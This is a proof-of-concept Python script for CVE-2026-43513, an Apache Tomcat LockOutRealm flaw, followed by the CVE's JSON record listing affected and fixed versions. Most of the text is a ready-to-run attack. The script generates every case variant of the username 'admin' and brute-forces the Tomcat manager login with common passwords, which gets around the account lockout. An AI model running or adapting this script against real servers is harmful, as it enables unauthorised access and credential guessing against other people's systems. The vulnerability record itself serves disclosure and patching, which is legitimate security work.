CVE-2026-43513

# PoC for CVE-2026-43513: Apache Tomcat LockOutRealm Bypass # This script demonstrates how an attacker can bypass account lockout # by varying the case of the username. import itertools import requests def generate_case_permutations(username): """Generate all possible case variations of a username.""" return set([''.join(p) for p in itertools.product(*[c.lower()+c.upper() for c in username])]) def attempt_login(url, username, password): """Simulate a login request.""" # Note: Actual endpoint and parameters depend on Tomcat configuration payload = {'j_username': username, 'j_password': password} try: response = requests.post(url, data=payload, timeout=5) return response.status_code == 200 and "Login Failed" not in response.text except requests.RequestException: return False def main(): target = "http://target-tomcat-manager:8080/manager/html" target_user = "admin" passwords = ["password", "123456", "admin", "tomcat"] print(f"[*] Starting brute force attack bypass for user: {target_user}") # Generate case variants (e.g., admin, Admin, ADMIN, aDmin, etc.) user_variants = generate_case_permutations(target_user) print(f"[*] Generated {len(user_variants)} username variants.") for pwd in passwords: for variant in user_variants: if attempt_login(target, variant, pwd): print(f"[+] SUCCESS! Logged in with username: '{variant}' and password: '{pwd}'") return else: print(f"[-] Failed with username: '{variant}' and password: '{pwd}'") print("[*] Attack completed.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-43513", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:18.177", "lastModified": "2026-05-14T20:17:05.727", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Handling of Case Sensitivity vulnerability in LockOutRealm in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109.\nOlder unsupported versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-178"}]}], "references": [{"url": "https://lists.apache.org/thread/ytjcgldshj73lcnd1sh95od5hrghwogp", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/12/9", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}